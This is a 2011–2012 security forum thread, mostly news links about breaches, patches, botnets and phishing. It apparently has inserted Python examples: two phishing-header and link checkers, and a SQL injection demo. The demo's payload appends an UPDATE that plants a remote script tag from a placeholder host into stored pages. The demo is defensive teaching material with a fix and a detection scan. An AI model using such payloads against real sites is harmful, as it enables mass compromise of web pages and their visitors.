I suspected this was going to extend to other browsers, though is that still related to IE browsers on Win7 x64?
Yes, x64 only atm, but they also admit that it could be misused without any browser as well.
They changed the info (Chief Security Advisor Blog) quite frequently lately. ;)
-
And where is this workstation? Your study desk in your bedroom?
No, it's beside my house where we all work together on infected computers ;)
-
And where is this workstation? Your study desk in your bedroom?
No, it's beside my house where we all work together on infected computers ;)
In the fresh air, great place to work, Craig is only jealous as he has to use a 10 year old laptop situated in the dunny. ;D
-
Back on topic guys...!! ;)
-
And where is this workstation? Your study desk in your bedroom?
No, it's beside my house where we all work together on infected computers ;)
In the fresh air, great place to work, Craig is only jealous as he has to use a 10 year old laptop situated in the dunny. ;D
It may be a laptop in the dunny (most comfortable seat in the house) but if you knew how to read signatures you would see that it isn't 10 years old ;D
-
Millions of printers open to devastating hack attack
http://redtape.msnbc.msn.com/_news/2011/11/29/9076395-exclusive-millions-of-printers-open-to-devastating-hack-attack-researchers-say
http://www.hp.com/hpinfo/newsroom/press/2011/111129b.html
HP LaserJet Firmware Update Now Available
http://www.hp.com/hpinfo/newsroom/press/2011/111223xa.html
-
And where is this workstation? Your study desk in your bedroom?
No, it's beside my house where we all work together on infected computers ;)
In the fresh air, great place to work, Craig is only jealous as he has to use a 10 year old laptop situated in the dunny. ;D
It may be a laptop in the dunny (most comfortable seat in the house) but if you knew how to read signatures you would see that it isn't 10 years old ;D
Hardly, that's one of the best laptops currently available.
-
Laugh, I nearly wet myself. HM Revenue & Customs refund for £1400.
Got a probable phishing/malware social engineering email, detected as spam by the simplest of filters in my MailWasher Pro anti-spam. Great that the UK HM Revenue & Customs would be sending their email from the Netherlands ;D
My filter is Not to me, couldn't be more basic: if the email isn't directly sent to one of my email addresses, it gets flagged (image1).
I really can't understand how people can get conned by these types of things as they are so easy to spot. When do you get informed of a tax refund when it is to "To: undisclosed-recipients:;"? Email headers are an absolute joke (image2). And finally the obligatory claim refund link directing you to the crooks (image3).
I'm going to let it through to see what avast makes of it ;D
EDIT, no alert by avast as it appears there is only the link (social engineering) to the Russian domain, where you are likely to get a nasty surprise (which hopefully the dumb would be protected by the network or web shields).
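The "Not to me" rule described in this post, plus a second check the same headers support (do the links in the body point anywhere near the claimed sender's domain?), can be run over raw messages with Python's standard `email` package. The block below is an added example and not code from the thread, from MailWasher Pro or from avast; the two sample messages and the `MY_ADDRESSES` set are constructed for the demonstration, and the domain comparison is a deliberately crude last-two-labels match.

```python
import re
from email import policy
from email.parser import BytesParser

# Constructed sample shaped like the refund lure described above (not the real email).
SAMPLE_PHISH = b"""From: "HM Revenue & Customs" <refunds@hmrc.example.gov>
To: undisclosed-recipients:;
Subject: Tax refund notification
Content-Type: text/plain; charset=us-ascii

You are eligible for a refund. Claim it here:
http://claim.example.net/refund?id=12345
"""

# Constructed legitimate message for comparison.
SAMPLE_OK = b"""From: "Alice" <alice@example.org>
To: me@example.org
Cc: alias@example.org
Subject: Lunch
Content-Type: text/plain; charset=us-ascii

Menu is at http://intranet.example.org/menu
"""

# Assumption: the mailboxes I actually own.
MY_ADDRESSES = {"me@example.org", "alias@example.org"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def parse(raw):
    return BytesParser(policy=policy.default).parsebytes(raw)


def recipients(msg):
    """All addr-specs in To/Cc; a group like 'undisclosed-recipients:;' yields none."""
    found = set()
    for name in ("To", "Cc"):
        for header in msg.get_all(name, []):
            for addr in header.addresses:
                found.add(addr.addr_spec.lower())
    return found


def sender_domain(msg):
    frm = msg["From"]
    if frm is None or not frm.addresses:
        return ""
    return frm.addresses[0].domain.lower()


def link_hosts(msg):
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body is not None else ""
    return {h.lower() for h in URL_RE.findall(text)}


def same_org(host, domain):
    # Crude: compare the last two labels (example.net vs example.gov).
    return host.split(".")[-2:] == domain.split(".")[-2:]


def flags(raw, my_addresses=MY_ADDRESSES):
    """Return the list of reasons this message looks suspicious (empty if none)."""
    msg = parse(raw)
    out = []
    if not (recipients(msg) & {a.lower() for a in my_addresses}):
        out.append("not-to-me")            # the filter described in the post
    dom, hosts = sender_domain(msg), link_hosts(msg)
    if dom and hosts and not any(same_org(h, dom) for h in hosts):
        out.append("link-domain-mismatch")  # "claim" link leads somewhere else entirely
    return out


if __name__ == "__main__":
    print("phish:", flags(SAMPLE_PHISH))
    print("ok:   ", flags(SAMPLE_OK))
```

Both flags are heuristics: mailing lists and Bcc'd mail also trip "not-to-me", which is why the post treats the rule as a cheap first filter rather than a verdict.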
-
Fidel Castro not dead.....again...malware ;)
http://www.euronews.net/2012/01/03/beware-twitter---castro-not-dead-again-/
-
WordPress 3.3.1 closes XSS hole
http://www.h-online.com/security/news/item/WordPress-3-3-1-closes-XSS-hole-1403297.html
-
OpenSSL Security Advisory
http://openssl.org/news/secadv_20120104.txt
-
WiFi Setup Flaw Allows Easy Router PIN Guessing
http://blogs.norman.com/2012/for-consumption/wifi-setup-flaw-allows-easy-router-pin-guessing
What Does Malware Look Like? ;D
http://blogs.norman.com/2011/for-consumption/have-a-safe-new-year
-
WiFi Setup Flaw Allows Easy Router PIN Guessing
http://blogs.norman.com/2012/for-consumption/wifi-setup-flaw-allows-easy-router-pin-guessing
More here: http://forum.avast.com/index.php?topic=66267.msg726442#msg726442
-
Patch Tuesday heads-up: Windows security holes
Microsoft plans to ship 7 bulletins, one rated “critical,” Microsoft’s highest severity rating.
Microsoft’s first batch of patches for 2012 will include fixes for security vulnerabilities in the Windows operating system and Microsoft Developer Tools and Software.
Microsoft also announced that one of the bulletins will fix an issue described as a “Security Feature Bypass.” It is the first time Microsoft has used this label on a security update.
The patches will be released next Tuesday (Jan 10, 2012) at approximately 1:00 PM EST.
-
"Lilupophilupop" infects a million URLs
http://www.h-online.com/security/news/item/Lilupophilupop-infects-a-million-URLs-1404812.html
http://isc.sans.org/diary/Lilupophilupop%2Btops%2B1million%2Binfected%2Bpages/12304
https://isc.sans.edu/diary.html?storyid=12127
-
Patch Tuesday heads-up: Windows security holes
Microsoft plans to ship 7 bulletins, one rated “critical,” Microsoft’s highest severity rating.
The patches will be released next Tuesday (Jan 10, 2012) at approximately 1:00 PM EST.
http://technet.microsoft.com/en-us/security/bulletin/ms12-jan
-
"Lilupophilupop" infects a million URLs
http://www.h-online.com/security/news/item/Lilupophilupop-infects-a-million-URLs-1404812.html
http://isc.sans.org/diary/Lilupophilupop%2Btops%2B1million%2Binfected%2Bpages/12304
https://isc.sans.edu/diary.html?storyid=12127
Well another day and a different SQL injection attack, not much difference from the last big one. There are many pro-active measures that can be followed as are mentioned in the 2nd article. Firefox with NoScript for the injected script tag is another measure.
Not to mention avast was all over the last SQL injection incident like a rash, with many people reporting sites being alerted on by avast when they were reputable/clean (NOT). So I guess we will have the same rash of hits in the viruses and worms forum claiming FPs.
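The mechanism behind this kind of mass injection (a text field concatenated straight into SQL, so the attacker's input appends an UPDATE that stores a remote script tag in every page) is shown below next to the parameterised version, followed by the scan a site owner would run to find already-injected records. This is an added example, not code from the thread or from the articles linked above; the tables, the payload and the `injected.example` host are constructed, and the vulnerable path uses sqlite3's `executescript` to mimic servers that accept stacked statements.

```python
import re
import sqlite3

# Matches a script tag whose src points at a remote host, as injected into stored text.
INJECTED_SCRIPT = re.compile(r'<script[^>]*\bsrc=["\']?(https?://[^"\'\s>]+)', re.I)

# Constructed payload: closes the quoted value, appends an UPDATE that tacks a remote
# script onto every product description, then comments out the rest of the statement.
PAYLOAD = ("nice'); UPDATE products SET description = description || "
           "'<script src=\"http://injected.example/script.js\"></script>'; --")


def fresh_db():
    """Small in-memory shop schema (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT);
        CREATE TABLE comments (id INTEGER PRIMARY KEY, product_id INTEGER, body TEXT);
        INSERT INTO products (name, description) VALUES ('Widget', 'A fine widget');
    """)
    return conn


def save_comment_vulnerable(conn, product_id, body):
    # Attacker-controlled text becomes part of the SQL itself.
    sql = "INSERT INTO comments (product_id, body) VALUES (%d, '%s');" % (product_id, body)
    conn.executescript(sql)  # stacked statements run, as on batch-capable servers


def save_comment_safe(conn, product_id, body):
    # Bound parameters: the body is data, never parsed as SQL.
    conn.execute("INSERT INTO comments (product_id, body) VALUES (?, ?)", (product_id, body))
    conn.commit()


def find_injected_scripts(conn):
    """Clean-up scan: (product id, remote script URL) for every tainted description."""
    hits = []
    for pid, desc in conn.execute("SELECT id, description FROM products ORDER BY id"):
        for url in INJECTED_SCRIPT.findall(desc or ""):
            hits.append((pid, url))
    return hits


def demo(vulnerable):
    """Run the payload through one code path; return (scan hits, stored comment bodies)."""
    conn = fresh_db()
    (save_comment_vulnerable if vulnerable else save_comment_safe)(conn, 1, PAYLOAD)
    bodies = [row[0] for row in conn.execute("SELECT body FROM comments ORDER BY id")]
    return find_injected_scripts(conn), bodies


if __name__ == "__main__":
    print("vulnerable:", demo(vulnerable=True))
    print("safe:      ", demo(vulnerable=False))
```

With the concatenating version the comment table ends up holding just "nice" while every product description now carries the remote script tag; with bound parameters the whole payload is stored as an ordinary string and the scan finds nothing. The same regex is what a site owner would run over text columns after an incident like the one above, before the antivirus alerts on the rendered pages are written off as false positives.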
-
So I guess we will have the same rash of hits in the viruses and worms forum claiming FPs.
Most likely. ;)
-
Ramnit Virus has stolen 45000 Facebook Login Credentials Worldwide
http://www.techgadgetsweb.com/6678/ramnit-virus-stolen-45000-facebook-login-credentials-worldwide
-
Ramnit Virus has stolen 45000 Facebook Login Credentials Worldwide
http://www.techgadgetsweb.com/6678/ramnit-virus-stolen-45000-facebook-login-credentials-worldwide
More here: http://blog.seculert.com/2012/01/ramnit-goes-social.html
-
Huge Security Breach at Security Firm Symantec No Threat to Consumers, Analyst Says
Hacked by some Indian hackers :P
http://www.foxnews.com/scitech/2012/01/06/symantec-source-code-theft-likely-no-threat-to-average-user-analyst-says/?google_editors_picks=true
-
FBI warns of new Zeus-based malware in phishing scam
http://www.networkworld.com/news/2012/010612-gameover-malware-254623.html
http://www.ehackingnews.com/2012/01/newer-variant-of-zeus-malware-game-over.html
http://krebsonsecurity.com/2011/11/ddos-attacks-spell-gameover-for-banks-victims-in-cyber-heists/
GameOver With Just One Click
http://blogs.norman.com/2012/for-consumption/gameover-with-just-one-click
-
Convicted murderer gets new trial after computer virus destroys data
http://nakedsecurity.sophos.com/2012/01/04/convicted-murderer-trial-virus/
-
Well the fake HM Revenue & Customs Tax Refund email I reported on the 2nd Jan finally made the papers now. It turns out that HM Revenue & Customs have known about this for some time and have shut down 149 sites (I believe that is the number, but of that order).
Why the hell didn't they make it public sooner is what I have to ask.
####
Following hard on its heels is yet another fake email, social engineering, phishing attempt, this time for Santander bank, with "Account blocked: Confirmation required" as the subject.
Yet again easy to spot (not least because I don't have a Santander account ;D), but banks just don't pull these sorts of strokes, asking for information in this way. If you have any doubt that it might actually be legit, then log on to your bank in the normal way, not via a link in an email.
The link in the email is easy to see as fraudulent, if you only look: hover the mouse over the link and look at the status bar of the email program, where the true URL is displayed. For me, using MailWasher, it displays the underlying URL, which sticks out like balls on a plate (image).
The email headers also show that it doesn't come from who they purport to be.
It also used an email address that I wouldn't use for banking, my filtering email which I use for non-trusted sources like banking.
So stay alert, stay suspicious, stay safe as there will be another along soon with a slightly different format.
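A small check for the two tells the post above describes, a link whose visible text does not match where it really points and a From: domain that differs from the Return-Path, as an added Python example that is not part of the original post. The message it analyses is constructed for this example with placeholder .example domains, not a real phishing sample, and all function names are this example's own:

```python
"""Added example: flag the two phishing tells described in the post above.

1. A link whose visible text looks like a URL but points somewhere else
   (what hovering over the link in the mail client reveals).
2. A From: domain that differs from the Return-Path / Reply-To domain
   (what the raw headers reveal).

The message below is constructed for this example with placeholder
.example domains; it is not a real sample.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

SAMPLE_EMAIL = """From: "Santander Online" <security@santander.example>
Return-Path: <bounce@mailer-1234.badhost.example>
Subject: Account blocked: Confirmation required
Content-Type: text/html; charset=utf-8

<html><body>
<p>Your account has been blocked. Please confirm your details.</p>
<a href="http://login.badhost.example/confirm">https://www.santander.example/login</a>
<a href="https://www.santander.example/help">help pages</a>
</body></html>
"""


class _LinkCollector(HTMLParser):
    """Collect (visible text, href) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def _host(url):
    """Hostname of a URL; bare 'www.foo' link text gets a scheme so urlparse works."""
    if not re.match(r"^[a-z][a-z0-9+.-]*://", url, re.I):
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def find_link_mismatches(html):
    """Return (visible text, href) pairs where the text is a URL whose host
    differs from the host the link actually points to."""
    collector = _LinkCollector()
    collector.feed(html)
    mismatches = []
    for text, href in collector.links:
        if href and re.match(r"^(https?://|www\.)", text, re.I) and _host(text) != _host(href):
            mismatches.append((text, href))
    return mismatches


def header_domains(msg):
    """Map From / Reply-To / Return-Path to the domain of the address in each."""
    domains = {}
    for header in ("From", "Reply-To", "Return-Path"):
        value = msg.get(header)
        if value:
            address = parseaddr(value)[1]
            if "@" in address:
                domains[header] = address.rsplit("@", 1)[1].lower()
    return domains


def analyze(raw_message):
    """Parse a raw RFC 822 message and report both tells."""
    msg = message_from_string(raw_message)
    domains = header_domains(msg)
    from_domain = domains.get("From")
    # True when any other sender header carries a different domain than From:
    header_mismatch = bool(from_domain) and any(
        d != from_domain for h, d in domains.items() if h != "From"
    )
    body = msg.get_payload(decode=True).decode(msg.get_content_charset() or "utf-8", "replace")
    return {
        "header_domains": domains,
        "header_mismatch": header_mismatch,
        "link_mismatches": find_link_mismatches(body),
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_EMAIL)
    for text, href in report["link_mismatches"]:
        print(f"link text {text!r} really goes to {href!r}")
    if report["header_mismatch"]:
        print("sender domains disagree:", report["header_domains"])
```

The link check only fires when the visible text itself looks like a URL, which is exactly the case a hover reveals; plain-word links such as "help pages" are left alone, since a mismatch there is normal and the hover is the only way to judge them.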
-
Signed malware: Snooping on Chinese students?
http://blogs.norman.com/2012/malware-detection-team/signed-malware-snooping-on-chinese-students
By redirecting the address to a different IP, attackers are able to present users with altered web content or perform man-in-the-middle attacks. The purpose of this against a student site is up for speculation.
I wonder what the reason can be......hmmmmm ;D
-
Microsoft Patches Critical Windows Drive-by Bug
http://blogs.norman.com/2012/security-exposed/microsoft-patches-critical-windows-drive-by-bug
Did You Think Email Is Threat Free? Think Again
http://blogs.norman.com/2012/security-exposed/did-you-think-email-is-threat-free-think-again
-
Zappos Hack Believed To Have Affected Millions
http://online.wsj.com/article/BT-CO-20120116-706917.html
I received a letter from them today telling me of the attack.
I bought some boots from them not too long ago. :'( (The boots are great.)
-
Zappos Hack Believed To Have Affected Millions
More here: http://www.h-online.com/security/news/item/Customer-data-exposed-in-Zappos-com-breach-1413676.html
-
Critical hole in McAfee products still open after more than 180 days
http://www.h-online.com/security/news/item/Critical-hole-in-McAfee-products-still-open-after-more-than-180-days-1413775.html
-
Oracle Critical Patch Update Advisory - January 2012
http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html
-
Typosquatting and Doppelgangers Pose Danger to Enterprises
http://blogs.norman.com/2012/security-exposed/typosquatting-and-doppelgangers-pose-danger-to-enterprises
Check Out Who Has Access to Your Social Media Accounts
http://blogs.norman.com/2012/for-consumption/check-out-who-has-access-to-your-social-media-accounts
-
New stealthy botnet Trojan holds Facebook users hostage
http://www.theregister.co.uk/2012/01/18/carberp_steals_e_cash_facebook/
Five Koobface botnet suspects named by New York Times
http://www.theregister.co.uk/2012/01/18/koobface_prime_suspect_outed/
-
Five Koobface botnet suspects named by New York Times
http://www.theregister.co.uk/2012/01/18/koobface_prime_suspect_outed/
Virus infections stop after suspects named
http://www.reuters.com/article/2012/01/19/us-facebook-cybersecurity-idUSTRE80I05720120119
-
McAfee software bug could turn customers' PCs into spam servers
http://www.theage.com.au/technology/security/mcafee-software-bug-could-turn-customers-pcs-into-spam-servers-20120120-1q93b.html
-
FBI shuts down Megaupload.com, Anonymous shut down FBI
http://www.heraldsun.com.au/fbi-shuts-down-megauploadcom-charges-seven-with-online-piracy/story-e6frfro0-1226249114650
-
more on the above......
FBI charges Megaupload operators with piracy crimes
http://news.cnet.com/8301-31001_3-57362152-261/fbi-charges-megaupload-operators-with-piracy-crimes/
Justice Department Charges Leaders of Megaupload with Widespread Online Copyright Infringement
http://www.fbi.gov/news/pressrel/press-releases/justice-department-charges-leaders-of-megaupload-with-widespread-online-copyright-infringement
-
http://www.theregister.co.uk/2012/01/05/ramnit_social_networking/
http://www.theregister.co.uk/2011/09/12/tdss_rented_botnet_shenanigans/
-
X.org server allows anyone to unlock computer
http://www.h-online.com/open/news/item/X-org-server-allows-anyone-to-unlock-computer-1417864.html
-
Anonymous's new weapon
http://www.h-online.com/security/news/item/Anonymous-s-new-weapon-1418337.html
-
Another reason for having NoScript ;D
-
http://www.theregister.co.uk/2012/01/05/ramnit_social_networking/
http://www.theregister.co.uk/2011/09/12/tdss_rented_botnet_shenanigans/
@true indian
already posted...see reply #1717...... check the date on the news before you post ::)
-
Linux root exploit due to memory access
http://www.h-online.com/security/news/item/Linux-root-exploit-due-to-memory-access-1419834.html
-
DreamHost - Changing Shell/FTP Passwords due to Security Issue
http://www.dreamhoststatus.com/2012/01/20/changing-ftpshell-passwords-due-to-security-issue/
-
more Megaupload.....seems he made a couple of bucks on this ;D
Dotcom's lavish life of parties and luxury
http://www.nzherald.co.nz/nz/news/article.cfm?c_id=1&objectid=10780514
http://video.google.com/videoplay?docid=8890260472062277672#
-
http://www.eweek.com/c/a/Security/Symantec-Warns-pcAnywhere-Users-to-Disable-Tool-Due-to-Source-Code-Theft-336440/
Symantec Warns pcAnywhere Users to Disable Tool Due to Source Code Theft
Symantec has confirmed that pcAnywhere users are at "increased risk" because attackers had stolen source code to the remote control tool
The saga over Symantec's stolen code took another twist as the company acknowledged that pcAnywhere customers are at risk for man-in-the-middle attacks and new exploits.
The breach actually occurred on Symantec servers in 2006 and attackers stole source code to several Norton security products and the pcAnywhere remote access tool, Symantec confirmed last week. At the time, the company assured customers that there was no risk to the products because the source code was so old and the company had made security improvements over the past six years.......... (more)
-
O2 sends users' phone numbers to web sites
http://www.h-online.com/security/news/item/O2-sends-users-phone-numbers-to-web-sites-1421553.html
-
Cisco IronPort Appliances Telnet Remote Code Execution Vulnerability
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport
-
Now you have your 20 posts, you don't have to swamp the topic with death by single post and you can post multiple entries per post as opposed to one every few minutes.
-
I know I can put multiple news stories in one post. However, since one person posted at least three times in a row in this thread, I thought that maybe it was acceptable for me to put only one news story per post. I also needed 20 posts so that I could set a profile picture, my birthday, my location, my gender, a website, and the time. If I had seen a post saying to put multiple news stories in one post, wait for someone else to post, and then post again, I wouldn't have posted as many times as I did.
I found a Secunia advisory about a vulnerability in the Syneto UTM operating system. It has not been patched. The advisory was released on January 27. The URL is http://secunia.com/advisories/47609.
-
Just a heads-up: Posting for (essentially) the sole purpose of increasing post count is definitely frowned upon here.
-
I found a Secunia advisory about a vulnerability in the Syneto UTM operating system. It has not been patched. The advisory was released on January 27. The URL is http://secunia.com/advisories/47609.
you're probably a "Syneto UTM" addict ???
-
I have decided to put quotes of all of the posts I made in this thread yesterday. I have decided to do this in case someone who is able to do so wants to remove the 14 posts I made in this thread yesterday, and in case anyone finds it easier to read the content of the posts I made in one post.
Post 1 of 14:
I found an article named NY Public Service Commission Acknowledges Security Breach, and the URL is http://thedailyattack.com/2012/01/27/ny-public-service-commission-acknowledges-security-breach/.
Post 2 of 14:
I found an article named Facebook sues alleged clickjacking spammer sparking row, and the URL is http://www.bbc.co.uk/news/technology-16755434.
Post 3 of 14:
I found an article named The real danger of the Zappos security breach, and the URL is http://www.courant.com/business/custom/consumer/hc-ls-zappos-20120128,0,3409169.story.
Post 4 of 14:
I found an article named Drive-By-Download Attack Exploits Critical Vulnerability in Windows Media Player, and the URL is http://www.csoonline.com/article/698951/drive-by-download-attack-exploits-critical-vulnerability-in-windows-media-player.
Post 5 of 14:
I found an article named Linux vendors urgently patch a security flaw, which is located at http://www.theinquirer.net/inquirer/news/2141626/linux-vendors-urgently-patch-security-flaw.
Post 6 of 14:
I found an article named Sonos warns of Wireless HiFi System security flaw, and the URL is http://www.expertreviews.co.uk/audio/1289884/sonos-warns-of-wireless-hifi-system-security-flaw.
Post 7 of 14:
I found an article named Google squashes security bugs in Chrome, pays over $6,000 in bounties at http://www.infosecurity-magazine.com/view/23479/google-squashes-security-bugs-in-chrome-pays-over-6000-in-bounties/.
Post 8 of 14:
I found an article named OS X Lion Includes Serious New Security Vulnerability. The URL is http://www.macguru.biz/os-x-lion-includes-serious-new-security-vulnerability/.
Post 9 of 14:
I found the story XSS Vulnerability Found in Google, Forbes, Myspace, MTV and Ferrari at http://news.softpedia.com/news/XSS-Vulnerability-Found-in-Google-Forbes-Myspace-MTV-Ferrari-248996.shtml.
Post 10 of 14:
I found an article named Hacker Finds Flaw in Gay-Dating Smartphone App at http://www.msnbc.msn.com/id/46133353/ns/technology_and_science-security/t/hacker-finds-flaw-gay-dating-smartphone-app/.
Post 11 of 14:
I found an article named Vlingo Privacy Breach: Data Sent to Remote Servers Without Consent at http://www.androidpit.com/en/android/blog/401784/Vlingo-security-flaw.
Post 12 of 14:
I found the story OpenSSL fixes flaw introduced in anti-decryption update located at http://www.computerworlduk.com/news/security/3331862/openssl-fixes-flaw-introduced-in-anti-decryption-update/.
Post 13 of 14:
I found the story Security Flaws Found in WordPress Setup at http://www.esecurityplanet.com/network-security/security-flaws-found-in-wordpress-setup.html.
Post 14 of 14:
I found the story Hackers Breached Railway Network, Disrupted Service at http://www.wired.com/threatlevel/2012/01/railyway-hack/.
Just a heads-up: Posting for (essentially) the sole purpose of increasing post count is definitely frowned upon here.
I don't plan on double posting or posting three or more times in a row on this forum anymore. I wanted to edit some parts of my profile, but I wasn't able to do so. I later discovered that I needed to have at least 20 posts. Since one person posted at least three times in a row, I decided to put one news article per post. My intention was not to annoy anyone.
I found a Secunia advisory about a vulnerability in the Syneto UTM operating system. It has not been patched. The advisory was released on January 27. The URL is http://secunia.com/advisories/47609.
you're probably a "Syneto UTM" addict ???
I am not. I don't recall ever hearing of that operating system until today. I added that to my post because I wanted to avoid posting off-topic. I use Windows 7 Home Premium.
-
Android.Counterclank Found in Official Android Market
http://www.symantec.com/connect/blogs/androidcounterclank-found-official-android-market
Symantec's trojan warning criticised as scaremongering
http://www.h-online.com/security/news/item/Symantec-s-trojan-warning-criticised-as-scaremongering-1424809.html
http://blog.mylookout.com/blog/2012/01/27/lookout%E2%80%99s-take-on-the-%E2%80%98apperhand%E2%80%99-sdk-aka-android-counterclank/
-
HTC Android phones expose Wi-Fi passwords to apps
http://www.h-online.com/security/news/item/HTC-Android-phones-expose-Wi-Fi-passwords-to-apps-1427099.html
http://blog.mywarwithentropy.com/2012/02/8021x-password-exploit-on-many-htc.html
-
http://www.bbc.co.uk/news/technology-16812064
Hackers outwit online banking identity security systems
Criminal hackers have found a way round the latest generation of online banking security devices given out by banks, the BBC has learned.
After logging in to the bank's real site, account holders are being tricked by the offer of training in a new "upgraded security system".
Money is then moved out of the account but this is hidden from the user.
Experts say customers should follow banks' official advice, use up-to-date anti-virus software and be vigilant.....(more)
-
Key Internet operator VeriSign hit by hackers
http://www.reuters.com/article/2012/02/02/us-hacking-verisign-idUSTRE8110Z820120202
-
Megaupload Shutdown Has A Silver Lining
http://blogs.norman.com/2012/for-consumption/megaupload-shutdown-has-a-silver-lining
-
Kelihos botnet BACK FROM THE DEAD
Bloodied spam-spewing zombie staggers in
http://www.theregister.co.uk/2012/02/02/kelihos_botnet_returns/
Trojan smuggles out nicked blueprints as Windows Update data
Malware backdoors government-targeted kit 'using Adobe 0-days'
http://www.theregister.co.uk/2012/02/01/spear_phishing_rats/
Virus-slingers abuse WordPress vulns, dose punters with exploit
Blogs also infected with information-harvesting Trojan
http://www.theregister.co.uk/2012/01/31/wordpress_vuln_phoenix/
-
@Pondus,
What vulnerabilities are being abused by the latest Hierarchy Exploit pack? To find out, read here:
http://malwareint.blogspot.com/search?updated-min=2012-01-01T00:00:00-07:00&updated-max=2013-01-01T00:00:00-07:00&max-results=2 (link- malware intelligence; link author = Steven K (X Y L I T O L) Malware Research),
polonus
-
Will the bad guys in India ever learn? ::) what a shame :'(
Indian military computers hacked, Symantec source code leaked
http://www.techspot.com/news/46990-indian-military-computers-hacked-symantec-source-code-leaked.html
-
Will the bad guys in India ever learn? ::) what a shame :'(
Indian military computers hacked, Symantec source code leaked
Old news..!! ;)
http://forum.avast.com/index.php?topic=52252.msg727906#msg727906
-
Secret Service Investigates Sophisticated $250 Million Cell Phone Cloning Scheme
http://blog.dhs.gov/2012/02/secret-service-investigates.html
-
Joomla! updates close information disclosure holes
http://www.h-online.com/security/news/item/Joomla-updates-close-information-disclosure-holes-1429303.html
-
Hackers wanted $50,000
http://news.cnet.com/8301-1009_3-57372308-83/hackers-wanted-$50000-to-keep-symantec-source-code-private/?tag=mncol;topStories
Anonymous Leaks Symantec’s pcAnywhere Source Code
http://news.softpedia.com/news/Anonymous-Leaks-Symantec-s-pcAnywhere-Source-Code-251237.shtml
-
Save Your Internet: DNSChanger Trojan Switch-Off Issues
http://blogs.norman.com/2012/for-consumption/save-your-internet-dnschanger-trojan-switch-off-issues
-
Save Your Internet: DNSChanger Trojan Switch-Off Issues
I found this information: "For English speaking users: Your system is not affected by the DNSChanger trojan malware. For more information on this topic please visit the FBI website."
http://www.dns-ok.de
-
MRG Effitas Online Banking Test Featured on BBC Click
http://www.youtube.com/watch?feature=player_embedded&v=EUGTlVSefeo#!
-
Iran Reportedly Cuts Off Access to Secure Internet Sites
http://www.pcmag.com/article2/0,2817,2400102,00.asp
-
Have your accounts been compromised? There’s a simple way to find out
http://blogs.norman.com/2012/for-consumption/have-your-accounts-been-compromisedtheres-a-simple-way-to-find-out
Have your accounts been compromised? Find out. - https://pwnedlist.com/
-
Microsoft Security Bulletin Advance Notification for February 2012
http://technet.microsoft.com/en-us/security/bulletin/ms12-feb
-
Something fishy about Google Chrome's Safe Browsing API, lab says
http://www.networkworld.com/news/2012/020712-something-fishy-about-google-chromes-255830.html
Google Chrome will no longer check for revoked SSL certificates online
http://www.networkworld.com/news/2012/020812-google-chrome-will-no-longer-255877.html
-
Google Chrome will no longer check for revoked SSL certificates online
thanks, that's interesting and worrying.
-
Google Wallet's PIN fails to fully protect
http://www.h-online.com/security/news/item/Report-Google-Wallet-s-PIN-fails-to-fully-protect-Update-1432289.html
-
Mozilla closes critical security hole in Firefox, Thunderbird and Seamonkey
http://www.h-online.com/security/news/item/Mozilla-closes-critical-security-hole-in-Firefox-Thunderbird-and-Seamonkey-1433248.html
https://www.mozilla.org/security/announce/2012/mfsa2012-10.html
-
Valve: hackers may have gained access to Steam transactions
http://www.h-online.com/security/news/item/Valve-hackers-may-have-gained-access-to-Steam-transactions-1433423.html
http://store.steampowered.com/news/7323/
-
Oracle Java SE Critical Patch Update Advisory - February 2012
http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html
-
Whoops! Texting accident goes viral
http://media.theage.com.au/entertainment/weird-week/whoops-texting-accident-goes-viral-3050318.html
-
Whoops! Texting accident goes viral
< clip >
Stupidity related: YES. Security related: NO.
-
Vulnerability in libpng prompts Firefox and Thunderbird updates
http://www.h-online.com/open/news/item/Vulnerability-in-libpng-prompts-Firefox-and-Thunderbird-updates-1436810.html
-
Cutwail botnet back in action
http://www.h-online.com/security/news/item/Cutwail-botnet-back-in-action-1437644.html
-
I was looking for something relevant to post in this thread and I came across something that surprised me. Under certain circumstances, a security flaw with an iPhone running iOS 5 can be exploited to gain access to contacts on the phone. The URL is http://technolog.msnbc.msn.com/_news/2012/02/21/10467826-paperclips-pose-security-threat-to-iphones.
-
Intego finds new, insidious strain of Mac Flashback Trojan horse
http://www.macworld.com/article/165534/2012/02/intego_finds_new_insidious_strain_of_mac_flashback_trojan_horse.html
-
Et Tu, Google? Android Apps Can Also Secretly Copy Photos
http://bits.blogs.nytimes.com/2012/03/01/android-photos/
-
Bitcoinica Warning: Please do not re-use any old Bitcoin deposit addresses
https://www.bitcoinica.com/posts/warning-please-do-not-re-use-and-old-bitcoin-deposit-addresses
http://status.linode.com/2012/03/manager-security-incident.html
-
GitHub security incident highlights Ruby on Rails problem
http://www.h-online.com/open/news/item/GitHub-security-incident-highlights-Ruby-on-Rails-problem-1463207.html
-
Adobe updates Flash Player closing more critical holes
http://www.h-online.com/security/news/item/Adobe-updates-Flash-Player-closing-more-critical-holes-1464247.html
-
Anonymous takes down security firm's website (Panda), vows to fight on after arrests
Computerworld - Hackers claiming to belong to the Anonymous hacking collective early Wednesday defaced Panda Security's PandaLabs website in apparent response to the arrests of five hackers Tuesday in the U.K. and the U.S.
http://www.computerworld.com/s/article/9224958/Anonymous_takes_down_security_firm_s_website_vows_to_fight_on_after_arrests
-
CanSecWest Pwnium: Google Chrome hacked with sandbox bypass
https://www.zdnet.com/blog/security/cansecwest-pwnium-google-chrome-hacked-with-sandbox-bypass/10563
-
CanSecWest Pwnium: Google Chrome hacked with sandbox bypass
